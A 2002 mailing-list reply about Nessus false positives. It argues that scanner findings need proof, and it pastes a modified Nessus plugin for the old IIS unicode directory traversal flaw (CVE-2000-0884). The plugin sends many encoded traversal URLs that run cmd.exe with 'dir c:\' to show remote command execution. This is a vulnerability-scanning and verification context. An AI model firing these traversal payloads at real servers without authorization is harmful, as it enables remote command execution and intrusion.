Re: false positives

[John Lampe]

weed out the false positives...I realize that seems overly simplistic; however, your reports to management (and clients) needs to be clean of any false positives.  I don't report a vulnerability unless I have a screenshot or packet capture to *prove* that I could compromise the machine.  Much of the "screenshotting" can be automated in Nessus (i.e. throw a display() call into your script and make it a part of the report).  See modified iis_dir_traversal.nasl below.  Another point that should be made to management is that 20 false positives is better than one false negative...And ISS is rife with false negatives...   I'm on a soapbox now...but, management should also understand that NESSUS, ISS, and other scanners are not a silver bullet.  Hell, a chimpanzee can click a "start" button...it's the human intervention and analysis that makes the penetration test a success.  Nessus gives you the most "raw" and useful data to begin your "real work" with....   # Approved 22Apr01 jao (replaces older version)   # # This script was first written Renaud Deraison then # completely re-written by HD Moore # # See the Nessus Scripts License for details #   if(description) {  script_id(10537);  script_cve_id("CVE-2000-0884");  name["english"] = "IIS directory traversal";  script_name(english:name["english"]);    desc["english"] = " The remote IIS server allows anyone to execute arbitrary commands by adding a unicode representation for the slash character in the requested path.   Solution:  See MS advisory MS 00-078 Risk factor: High";    script_description(english:desc["english"]);    summary["english"] = "Determines if arbitrary commands can be executed Thanks to IIS";    script_summary(english:summary["english"]);  script_category(ACT_GATHER_INFO);  script_copyright(english:"This script is Copyright (C) 2001 H D Moore");  family["english"] = "CGI abuses";  script_family(english:family["english"]);  script_dependencie("find_service.nes");  script_require_ports("Services/www", 80);  exit(0); } port = get_kb_item("Services/www"); if(!port)port = 80;   dir[0] = "/scripts/"; dir[1] = "/msadc/"; dir[2] = "/iisadmpwd/"; dir[3] = "/_vti_bin/";          # FP dir[4] = "/_mem_bin/";          # FP dir[5] = "/exchange/";          # OWA dir[6] = "/pbserver/";          # Win2K dir[7] = "/rpc/";               # Win2K dir[8] = "/cgi-bin/"; dir[9] = "/";   uni[0] = "%c0%af"; uni[1] = "%c0%9v"; uni[2] = "%c1%c1"; uni[3] = "%c0%qf"; uni[4] = "%c1%8s"; uni[5] = "%c1%9c"; uni[6] = "%c1%pc"; uni[7] = "%c1%1c"; uni[8] = "%c0%2f"; uni[9] = "%e0%80%af"; uni[10] = "%cg%qf"; uni[11] = "%bg%qf"; uni[12] = "%cg%9v"; uni[13] = "%e0%80%qe"; uni[14] = "%dg%7g%ae"; uni[15] = "%cg%9u"; uni[16] = "%dg%o0%ae"; uni[17] = "%d1%9c"; uni[18] = "%cg%af"; uni[19] = "%ch%8s";   function check(req) {  soc = open_sock_tcp(port);  if(soc)  {  req = http_get(item:req, port:port);  send(socket:soc, data:req);  r = recv(socket:soc, length:10240);  close(soc);  pat = "<DIR>";  pat2 = "Directory of C";    if((pat >< r) || (pat2 >< r)){         mypattern = r;         return(1);         }  }  return(0); }   hostip = get_host_ip(); total_warning = ""; totaldirs = 0; cmd = "/winnt/system32/cmd.exe?/c+dir+c:\\"; for(d=0;dir[d];d=d+1) {         for(u=0;uni[u];u=u+1)         {                 url = string(dir[d], "..", uni[u], "..", uni[u], "..", uni[u], "..", uni[u], "..",   uni[u], "..", cmd);                 if(check(req:url)) {                     total_warning = string (total_warning, "\n" , "http://", hostip, url);                     totaldirs = totaldirs + 1;                 }         } }   if (totaldirs > 0) {     total_warning = string (total_warning, "\n\n" , "were found to yield a remote shell\n", "\n\nS creenshot:\n\n", mypattern);     security_hole(port:port, data:total_warning); }     John Lampe https://f00dikator.hn.org/   "Knowledge will forever govern ignorance, and a people who mean to be their own governors, must arm themselves with the power knowledge gives. A popular government without popular information or the means of acquiring it, is but a prologue to a farce or a tragedy or perhaps both." --James Madison ----- Original Message ----- From: Tim Sailer To: [EMAIL PROTECTED] Sent: Monday, July 22, 2002 6:29 PM Subject: false positives Folks,   I'm getting serious pressure from Management to switch from Nessus to ISS. One of the reasons being is that they claim that Nessus is clouding any real issues with false positives. Does anyone else have the same problem, and if so, how are you getting around it? Tim -- Tim Sailer <[EMAIL PROTECTED]> Brookhaven National Laboratory  (631) 344-3001